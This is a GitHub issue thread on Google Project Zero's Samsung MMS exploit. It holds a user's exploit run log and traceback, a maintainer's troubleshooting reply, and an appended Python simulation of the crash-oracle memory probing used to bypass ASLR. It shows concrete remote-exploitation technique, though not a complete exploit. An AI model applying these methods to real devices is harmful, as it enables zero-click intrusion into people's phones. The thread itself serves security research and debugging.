googleprojectzero / SkCodecFuzzer

Fuzzing harness for testing proprietary image codecs supported by Skia on Android
Apache License 2.0
330 stars 77 forks

assert(len(candidates) > 0) AssertionError #7

Closed lomisedu closed 2 years ago

lomisedu commented 2 years ago

Hi, I tried to reproduce the whole exploit on:

  1. Samsung Note 9 (Android 9, security patch January 1, 2019)
  2. Samsung Galaxy A30s (Android 10, security patch 1 March 2020)

However, both models always have the following error:

in FindRegionMethod3 assert(len(candidates) > 0) AssertionError

It seems that the candidates for libhwui.so are always empty. What is the reason for not being able to find candidates? Thanks!

2022-04-12 03:56:29,396 [INFO ] Sending test MMS to check if the device is online...
2022-04-12 03:56:41,433 [INFO ] Received ack, phone is up and the setup works.
2022-04-12 03:56:41,433 [INFO ] Crashing the Messages app remotely now to get a clean state for further exploitation.
2022-04-12 03:56:43,716 [INFO ] Starting the ASLR bypass process...
2022-04-12 03:58:02,473 [INFO ] Range [6f00000000 .. 6f00000fff] is readable: True
2022-04-12 03:59:21,210 [INFO ] Range [6f00000000 .. 6f3fffffff] is readable: True
2022-04-12 03:59:21,210 [INFO ] Found address 0x6f00000000 inside CFI in 2 queries
2022-04-12 04:00:38,960 [INFO ] Range [6f00000000 .. 6f7fffffff] is readable: True
2022-04-12 04:01:57,634 [INFO ] Range [6f80000000 .. 6fbfffffff] is readable: True
2022-04-12 04:03:15,449 [INFO ] Range [6fc0000000 .. 6fdfffffff] is readable: True
2022-04-12 04:04:53,112 [INFO ] Range [6fe0000000 .. 6fefffffff] is readable: False
2022-04-12 04:06:00,705 [INFO ] Range [6fe0000000 .. 6fe7ffffff] is readable: False
2022-04-12 04:06:49,435 [INFO ] Range [6fe0000000 .. 6fe3ffffff] is readable: True
2022-04-12 04:26:12,124 [INFO ] Range [6fe4000000 .. 6fe5ffffff] is readable: True
2022-04-12 04:31:37,339 [INFO ] Range [6fe6000000 .. 6fe6ffffff] is readable: True
2022-04-12 04:32:57,045 [INFO ] Range [6fe7000000 .. 6fe77fffff] is readable: True
2022-04-12 04:34:15,726 [INFO ] Range [6fe7800000 .. 6fe7bfffff] is readable: True
2022-04-12 04:35:33,403 [INFO ] Range [6fe7c00000 .. 6fe7dfffff] is readable: True
2022-04-12 04:36:53,171 [INFO ] Range [6fe7e00000 .. 6fe7efffff] is readable: True
2022-04-12 04:38:14,960 [INFO ] Range [6fe7f00000 .. 6fe7f7ffff] is readable: True
2022-04-12 04:39:34,748 [INFO ] Range [6fe7f80000 .. 6fe7fbffff] is readable: True
2022-04-12 04:40:53,445 [INFO ] Range [6fe7fc0000 .. 6fe7fdffff] is readable: True
2022-04-12 04:42:12,143 [INFO ] Range [6fe7fe0000 .. 6fe7feffff] is readable: True
2022-04-12 04:43:29,804 [INFO ] Range [6fe7ff0000 .. 6fe7ff7fff] is readable: True
2022-04-12 04:45:07,474 [INFO ] Range [6fe7ff8000 .. 6fe7ffbfff] is readable: False
2022-04-12 04:46:02,276 [INFO ] Range [6fe7ff8000 .. 6fe7ff9fff] is readable: True
2022-04-12 04:47:22,056 [INFO ] Range [6fe7ffa000 .. 6fe7ffafff] is readable: True
2022-04-12 04:47:31,479 [INFO ] CFI region end 0x6fe7ffb000 found after 22 queries (0 cached)
2022-04-12 04:48:43,825 [INFO ] Range [6fe83fb000 .. 6fe83fbfff] is readable: True
2022-04-12 04:51:01,108 [INFO ] Range [6fe88fb000 .. 6fe88fbfff] is readable: True
2022-04-12 04:52:18,837 [INFO ] Range [6fe8dfb000 .. 6fe8dfbfff] is readable: True
2022-04-12 04:53:37,631 [INFO ] Range [6fe92fb000 .. 6fe92fbfff] is readable: True
2022-04-12 04:54:56,523 [INFO ] Range [6fe97fb000 .. 6fe97fbfff] is readable: True
2022-04-12 04:56:34,248 [INFO ] Range [6fe9cfb000 .. 6fe9cfbfff] is readable: False
2022-04-12 04:57:22,945 [INFO ] Range [6fe9bfb000 .. 6fe9bfbfff] is readable: True
2022-04-12 04:58:42,677 [INFO ] Range [6fea0fb000 .. 6fea0fbfff] is readable: True
2022-04-12 05:00:00,366 [INFO ] Range [6fea5fb000 .. 6fea5fbfff] is readable: True
2022-04-12 05:01:38,076 [INFO ] Range [6feaafb000 .. 6feaafbfff] is readable: False
2022-04-12 05:02:28,836 [INFO ] Range [6fea9fb000 .. 6fea9fbfff] is readable: True
2022-04-12 05:03:46,521 [INFO ] Range [6feaefb000 .. 6feaefbfff] is readable: True
2022-04-12 05:11:15,562 [INFO ] Range [6feb3fb000 .. 6feb3fbfff] is readable: True
2022-04-12 05:12:37,340 [INFO ] Range [6feb8fb000 .. 6feb8fbfff] is readable: True
2022-04-12 05:14:15,036 [INFO ] Range [6febdfb000 .. 6febdfbfff] is readable: False
2022-04-12 05:15:22,722 [INFO ] Range [6febcfb000 .. 6febcfbfff] is readable: False
2022-04-12 05:16:13,446 [INFO ] Range [6febbfb000 .. 6febbfbfff] is readable: True
2022-04-12 05:17:32,184 [INFO ] Range [6fec0fb000 .. 6fec0fbfff] is readable: True
2022-04-12 05:18:50,909 [INFO ] Range [6fec5fb000 .. 6fec5fbfff] is readable: True
2022-04-12 05:20:08,580 [INFO ] Range [6fecafb000 .. 6fecafbfff] is readable: True
2022-04-12 05:21:33,359 [INFO ] Range [6fecffb000 .. 6fecffbfff] is readable: True
2022-04-12 05:22:52,043 [INFO ] Range [6fed4fb000 .. 6fed4fbfff] is readable: True
2022-04-12 05:24:10,763 [INFO ] Range [6fed9fb000 .. 6fed9fbfff] is readable: True
2022-04-12 05:25:48,482 [INFO ] Range [6fedefb000 .. 6fedefbfff] is readable: False
2022-04-12 05:26:36,187 [INFO ] Range [6feddfb000 .. 6feddfbfff] is readable: True
Traceback (most recent call last):
  File "C:\Users\Ledu\Desktop\SkCodecFuzzer\mms_exploit\exploit.py", line 445, in <module>
    main(sys.argv)
  File "C:\Users\Ledu\Desktop\SkCodecFuzzer\mms_exploit\exploit.py", line 442, in main
    exploit.Pwn()
  File "C:\Users\Ledu\Desktop\SkCodecFuzzer\mms_exploit\exploit.py", line 315, in Pwn
    libhwui_base = self.FindRegionMethod3(analysis_start_addr,
  File "C:\Users\Ledu\Desktop\SkCodecFuzzer\mms_exploit\exploit.py", line 246, in FindRegionMethod3
    assert(len(candidates) > 0)
AssertionError

j00ru commented 2 years ago

The exploit was written for Samsung Galaxy Note 10+ with Android 10 (February 2020 patch level). It won't work with Android 9, or even with other builds of Android 10 without adjusting some things in the config file and/or script.

In your case, the oracle seems to be returning too many "True" results, which indicates that the app doesn't always crash when it should. This may suggest that either the heap behaves differently than expected and the two allocations are not adjacent, or that the layout of some object (e.g. the Bitmap) is different. To figure out the exact problem, you'd have to debug the test phone to see which assumption is broken. This part of the exploit is described in detail in MMS Exploit Part 3: Constructing the Memory Corruption Primitives.
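The probing pattern the log above records (range queries narrowing down the CFI region end, then single-page probes at a fixed stride to locate a library-sized mapping) and the failure j00ru describes, as an added example that is not part of the SkCodecFuzzer repository or of the exploit.py in the traceback: it simulates the "is readable" crash oracle against a constructed memory map and shows how an oracle that answers True when the app should have crashed leaves the candidate list empty. Everything here is an assumption of this example rather than the exploit's real logic (FindRegionMethod3 is not shown on this page): the MemoryMap, flaky_oracle, oracle_sanity_check, find_region_end, first_readable_page and scan_candidates names, every address except the two CFI bounds copied from the log, the 1 MiB stride, the 24 MiB "libhwui.so" stand-in, the low pages assumed unmapped, and the parity-based model of a non-crashing oracle.

```python
"""Crash-oracle search for a region end and a library-sized region after it.

Added example, not code from SkCodecFuzzer/mms_exploit. It replays the
"Range [a .. b] is readable" probing pattern from the log above against a
constructed memory map and shows how an oracle that answers True when the
app should have crashed leaves no candidate of the expected size."""
PAGE = 0x1000

class MemoryMap:
    """Constructed process map: sorted (start, end) readable ranges."""
    def __init__(self, regions):
        self.regions = sorted(regions)

    def is_readable(self, start, end):
        """Ground-truth oracle: True iff every page in [start, end) is mapped."""
        pos = start
        for rs, re in self.regions:
            if re <= pos:
                continue
            if rs > pos:
                return False  # page at pos is unmapped
            pos = re
            if pos >= end:
                return True
        return pos >= end

def flaky_oracle(mem):
    """Stand-in for 'the app does not always crash when it should': unreadable
    ranges starting at an odd page index are reported readable (arbitrary, deterministic)."""
    return lambda s, e: mem.is_readable(s, e) or (s // PAGE) % 2 == 1

def oracle_sanity_check(oracle, known_unreadable, known_readable):
    """Cheap pre-flight: False on pages assumed unmapped, True on a mapped one."""
    if not oracle(known_readable, known_readable + PAGE):
        return False
    return all(not oracle(p, p + PAGE) for p in known_unreadable)

def find_region_end(oracle, addr, limit):
    """addr is page-aligned and readable: return the first unreadable page
    address after it (gallop with doubling probes, then bisect)."""
    lo, span = addr + PAGE, PAGE
    while oracle(lo, lo + span):  # [addr, lo + span) is readable, extend
        lo += span
        span *= 2
        if lo + span - addr > limit:
            raise RuntimeError("no region end within limit")
    hi = lo + span  # [lo, hi) holds the first unreadable page
    while hi - lo > PAGE:
        mid = lo + ((hi - lo) // 2 // PAGE) * PAGE
        if oracle(lo, mid):
            lo = mid
        else:
            hi = mid
    return lo

def first_readable_page(oracle, bad, good):
    """bad < good, page at bad unreadable, at good readable: bisect to the region base."""
    while good - bad > PAGE:
        mid = bad + ((good - bad) // 2 // PAGE) * PAGE
        if oracle(mid, good + PAGE):
            good = mid
        else:
            bad = mid
    return good

def scan_candidates(oracle, start, stride, count, expected_size, limit):
    """Probe one page per stride from start, group readable probes into runs, keep
    runs of roughly expected_size and refine to exact (base, end). Empty = the AssertionError case."""
    probes = [start + k * stride for k in range(count)]
    readable = [oracle(p, p + PAGE) for p in probes]
    candidates, k = [], 0
    while k < count:
        if not readable[k]:
            k += 1
            continue
        j = k
        while j + 1 < count and readable[j + 1]:
            j += 1
        if abs((j - k + 1) * stride - expected_size) <= stride:
            base = probes[k]
            if k > 0:  # previous probe was unreadable: bisect to the true base
                base = first_readable_page(oracle, probes[k - 1], probes[k])
            candidates.append((base, find_region_end(oracle, probes[j], limit)))
        k = j + 1
    return candidates

# Constructed map: CFI bounds from the log; 24 MiB stands in for libhwui.so, rest are decoys.
CFI_BASE, CFI_END = 0x6F00000000, 0x6FE7FFB000
LIB_BASE, LIB_END = 0x6FEB000000, 0x6FEC800000
MAP = MemoryMap([(CFI_BASE, CFI_END), (0x6FE8800000, 0x6FE8A00000),
                 (LIB_BASE, LIB_END), (0x6FEF000000, 0x6FF0000000)])
STRIDE, COUNT, LIB_SIZE, LIMIT = 0x100000, 160, LIB_END - LIB_BASE, 0x200000000
LOW_PAGES = [0x0, 0x1000, 0x2000, 0x3000]  # assumed unmapped (mmap_min_addr)

if __name__ == "__main__":
    for name, oracle in (("truthful", MAP.is_readable), ("flaky", flaky_oracle(MAP))):
        cands = scan_candidates(oracle, CFI_END, STRIDE, COUNT, LIB_SIZE, LIMIT)
        print(name, oracle_sanity_check(oracle, LOW_PAGES, CFI_BASE), [(hex(b), hex(e)) for b, e in cands])
```

With the truthful oracle the scan finds exactly one run of the expected size and refines it to the constructed base and end; with the flaky oracle every probe after the CFI end comes back True, the runs merge into one oversized block, and the result is the empty list that trips the assert in the traceback. The sanity check is the cheap thing to run first: a handful of probes on pages that must be unmapped, repeated a few times, tells you whether the crash primitive is reliable on a given build before an hour of MMS round trips is spent on a search whose assumptions (adjacent allocations, object layout) may not hold, which is the calibration j00ru's reply points to.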